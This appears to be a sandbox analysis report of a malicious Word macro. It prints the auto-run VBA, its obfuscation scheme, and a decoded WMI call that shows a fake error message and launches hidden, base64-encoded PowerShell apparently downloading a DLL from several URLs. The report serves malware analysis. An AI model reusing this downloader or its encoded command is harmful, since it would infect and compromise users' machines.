                                                                                                                        Module: Ntx3xle2gjt1

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Ntx3xle2gjt1"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = True

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = True

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = True

                                                                                                                        Executed Functions
                                                                                                                        Subroutine Document_open, APIs: 49, Strings: 0, Number of lines: 3, Relevance: 75.003
                                                                                                                        APIsMeta Information

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Item

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Zgw6mqlr7l2u51

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: ChrW

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Yp8t40c73pqf9j6

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: wdKeyS

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: V0ds16izbsl_xm

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Eah7s5mir8k6q8

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: CreateObject

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Mid

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Len

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Create

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Jib98w2i8chhr

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: N4enanrrzm_ja

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

                                                                                                                        LineInstructionMeta Information
                                                                                                                        9

                                                                                                                        Private Sub Document_open()

                                                                                                                        10

                                                                                                                        Vj_abq1qp3rat9wz

                                                                                                                        executed
                                                                                                                        11

                                                                                                                        End Sub

                                                                                                                        Module: Pkebr_y5xjd5hl070

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Pkebr_y5xjd5hl070"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: Seby_rq4k8mp

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "Seby_rq4k8mp"

                                                                                                                        2

                                                                                                                        Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"

                                                                                                                        3

                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                        4

                                                                                                                        Attribute VB_Creatable = False

                                                                                                                        5

                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                        6

                                                                                                                        Attribute VB_Exposed = False

                                                                                                                        7

                                                                                                                        Attribute VB_TemplateDerived = False

                                                                                                                        8

                                                                                                                        Attribute VB_Customizable = False

                                                                                                                        Module: T1f2hilsywf9dq

                                                                                                                        Declaration
                                                                                                                        LineContent
                                                                                                                        1

                                                                                                                        Attribute VB_Name = "T1f2hilsywf9dq"

                                                                                                                        Executed Functions
                                                                                                                        Function Vj_abq1qp3rat9wz, APIs: 73, Strings: 40, Number of lines: 266, Relevance: 208.516
                                                                                                                        APIsMeta Information

                                                                                                                        Item

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Zgw6mqlr7l2u51

                                                                                                                        ChrW

                                                                                                                        Yp8t40c73pqf9j6

                                                                                                                        wdKeyS

                                                                                                                        V0ds16izbsl_xm

                                                                                                                        Eah7s5mir8k6q8

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        CreateObject

                                                                                                                        		CreateObject("winmgmtS:win32_process")

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Mid

                                                                                                                        Len

                                                                                                                        		Len("\x01 qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAAqq)(s2)(gACqq)(s2)(QAYqq)(s2)(wBWqq)(s2)(AE4qq)(s2)(AZwqq)(s2)(BBAqq)(s2)(FMAqq)(s2)(PQAqq)(s2)(gAFqq)(s2)(sAVqq)(s2)(AB5qq)(s2)(AFAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(EAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DMAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(IAfqq)(s2)(QAiqq)(s2)(AC0qq)(s2)(ARgqq)(s2)(AgAqq)(s2)(CcAqq)(s2)(WQBqq)(s2)(TAFqq)(s2)(QAZqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ASQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(TACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AFIqq)(s2)(AeQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(PACqq)(s2)(4ARqq)(s2)(ABpqq)(s2)(AHIqq)(s2)(ARQqq)(s2)(BDAqq)(s2)(FQAqq)(s2)(bwAqq)(s2)(nACqq)(s2)(kAOqq)(s2)(wAgqq)(s2)(ACAqq)(s2)(AIAqq)(s2)(BzAqq)(s2)(GUAqq)(s2)(dAAqq)(s2)(tAEqq)(s2)(kAVqq)(s2)(ABFqq)(s2)(AE0qq)(s2)(AIAqq)(s2)(AoAqq)(s2)(CIAqq)(s2)(dgBqq)(s2)(hAHqq)(s2)(IAaqq)(s2)(QBhqq)(s2)(AEIqq)(s2)(AbAqq)(s2)(BlAqq)(s2)(CIAqq)(s2)(KwAqq)(s2)(iADqq)(s2)(oAbqq)(s2)(AA2qq)(s2)(AFUqq)(s2)(AIgqq)(s2)(ArAqq)(s2)(CIAqq)(s2)(WQBqq)(s2)(IACqq)(s2)(IAKqq)(s2)(wAiqq)(s2)(AE4qq)(s2)(AIgqq)(s2)(ApAqq)(s2)(CAAqq)(s2)(IAAqq)(s2)(oAFqq)(s2)(sAVqq)(s2)(ABZqq)(s2)(AHAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(UAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DcAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(QAfqq)(s2)(QB7qq)(s2)(ADgqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DIAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(MAfqq)(s2)(QB7qq)(s2)(ADYqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DEAqq)(s2)(fQAqq)(s2)(iACqq)(s2)(0ARqq)(s2)(gAgqq)(s2)(ACcqq)(s2)(AWQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(HAGqq)(s2)(UAcqq)(s2)(gAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BFAqq)(s2)(FAAqq)(s2)(bwBqq)(s2)(JACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AE4qq)(s2)(AdAqq)(s2)(BtAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(QARqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ATgqq)(s2)(BlAqq)(s2)(HQAqq)(s2)(LgBqq)(s2)(zAGqq)(s2)(UAJqq)(s2)(wAsqq)(s2)(ACcqq)(s2)(Acwqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(BAGqq)(s2)(4AQqq)(s2)(QAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BzAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(IAdqq)(s2)(gBJqq)(s2)(AGMqq)(s2)(AJwqq)(s2)(ApAqq)(s2)(CkAqq)(s2)(OwAqq)(s2)(gACqq)(s2)(QAWqq)(s2)(ABkqq)(s2)(AHoqq)(s2)(AXwqq)(s2)(B0Aqq)(s2)(F8Aqq)(s2)(aQAqq)(s2)(9ACqq)(s2)(gAJqq)(s2)(wBBqq)(s2)(AHUqq)(s2)(AJwqq)(s2)(ArAqq)(s2)(CgAqq)(s2)(JwBqq)(s2)(6ADqq)(s2)(AAeqq)(s2)(gAnqq)(s2)(ACsqq)(s2)(AJwqq)(s2)(BxAqq)(s2)(HgAqq)(s2)(JwAqq)(s2)(pACqq)(s2)(kAOqq)(s2)(wAkqq)(s2)(AFAqq)(s2)(AaQqq)(s2)(BpAqq)(s2)(DgAqq)(s2)(bwBqq)(s2)(lAGqq)(s2)(4APqq)(s2)(QAkqq)(s2)(AEIqq)(s2)(AMAqq)(s2)(B4Aqq)(s2)(GsAqq)(s2)(MAAqq)(s2)(0AHqq)(s2)(IAIqq)(s2)(AArqq)(s2)(ACAqq)(s2)(AWwqq)(s2)(BjAqq)(s2)(GgAqq)(s2)(YQBqq)(s2)(yAFqq)(s2)(0AKqq)(s2)(AA2qq)(s2)(ADQqq)(s2)(AKQqq)(s2)(AgAqq)(s2)(CsAqq)(s2)(IAAqq)(s2)(kAFqq)(s2)(YAYqq)(s2)(QBsqq)(s2)(ADYqq)(s2)(AcQqq)(s2)(BhAqq)(s2)(HgAqq)(s2)(OwAqq)(s2)(kAEqq)(s2)(wAcqq)(s2)(gBfqq)(s2)(AGwqq)(s2)(AcQqq)(s2)(BuAqq)(s2)(HcAqq)(s2)(PQAqq)(s2)(oACqq)(s2)(gAJqq)(s2)(wBQqq)(s2)(AGsqq)(s) -> 29620

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Create

                                                                                                                        		SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcA,,) -> 0

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open

                                                                                                                        Jib98w2i8chhr

                                                                                                                        N4enanrrzm_ja

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        StringsDecrypted Strings
                                                                                                                        "EMnBm.qhzCjGG.AdplaCwr"
                                                                                                                        "qZLyIGBoG.pxIvxHQJ.ruafsIGOH"
                                                                                                                        "sxxLaTTrF.HCwgq.ncoBz"
                                                                                                                        "qq)(s2)""(pqq)(s2)("
                                                                                                                        "qq)(s2)(roqq"")(s2)(qq)(s2)(ceq""q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
                                                                                                                        "OstrD.remYG.TgODSiEJw"
                                                                                                                        "zaIoLA.TXEWrApGI.WoizH"
                                                                                                                        "QvCuBxUE.JkVTZJh.XniaV"
                                                                                                                        "qq)(s2)(:wqq)(s2)(qq)(s""2)(inqq)(s2)(3qq)(s2)(2qq"")(s2)(_qq)(s2)("
                                                                                                                        "wLbyGHRF.DHtWiADE.NZhmG"
                                                                                                                        "npKeJB.AsJFFIJ.PEOYbGOz"
                                                                                                                        "Xfyzv.AwqqF.CSulDx"
                                                                                                                        "wqq)(s2)(inqq)(s2)(mqq)(s""2)(gmqq)(s2)(t""qq)(s2)(qq)(s2)("
                                                                                                                        "YPhnJPEH.HagGFmEIC.cyyfEHaR"
                                                                                                                        "UHYrC.GZeVBEo.SOkEIBXGV"
                                                                                                                        "aejsJk.ugJxod.tsCaOC"
                                                                                                                        "lzFAlTr.gioDBGHB.nAGbrAU"
                                                                                                                        "DlhFJNHB.bhBvj.BSVeVFGRY"
                                                                                                                        "kLAOAG.wDTBF.VrHOCGc"
                                                                                                                        "BbJaFjST.Xrzpku.uVfFAHQv"
                                                                                                                        "AigvGEHIB.PPCtCYDWg.gBVHiqCD"
                                                                                                                        "VLWvGECBE.hSxDGF.RmBdHqNjD"
                                                                                                                        "jGlnHJ.WuqlLbxyF.HGhglIF"
                                                                                                                        "DgRkGC.oezuIJ.QreJABJlU"
                                                                                                                        "KjXoEi.VPFBSHI.smiQyd"
                                                                                                                        "GlzLdHXJB.ukgsrF.MzrWIEjI"
                                                                                                                        "iPfhytE.BYjiXI.XRadQ"
                                                                                                                        "MuBaJAqI.JJwbBIG.xcQNDHA"
                                                                                                                        "DGVxCZh.RlEFPCEb.wIwVQJJBo"
                                                                                                                        "XBCgYJ.OzLWBT.wAQnUP"
                                                                                                                        "glqhDDI.CLTNCt.xZeqp"
                                                                                                                        "pDOcllCuD.lEzLut.kKCfGuBND"
                                                                                                                        "ZVPyGDo.KHVpyJEJI.kpQfJeY"
                                                                                                                        "zDQxMR.iplzr.wAjoodIF"
                                                                                                                        "QrkQH.tOWCIP.GrDHUJ"
                                                                                                                        "LQAVC.FldzmI.oCeVXZC"
                                                                                                                        "xbtmGo.qIuZXGHJ.RZptvtQEG"
                                                                                                                        "cRxbPCb.XykXFJGA.LtZggMsGa"
                                                                                                                        "HoPXpGBA.IwHCJMDRA.CmlzH"
                                                                                                                        "OECHJGADF.eWIOVB.CjlHH"
                                                                                                                        LineInstructionMeta Information
                                                                                                                        60

                                                                                                                        Function Vj_abq1qp3rat9wz()

                                                                                                                        61

                                                                                                                        On Error Resume Next

                                                                                                                        executed
                                                                                                                        62

                                                                                                                        sh2v = Ntx3xle2gjt1.StoryRanges.Item(1)

                                                                                                                        Item

                                                                                                                        63

                                                                                                                        Goto suyzGICEH

                                                                                                                        64

                                                                                                                        Dim hlWxWgB as String

                                                                                                                        65

                                                                                                                        Dim EzJGE as String

                                                                                                                        66

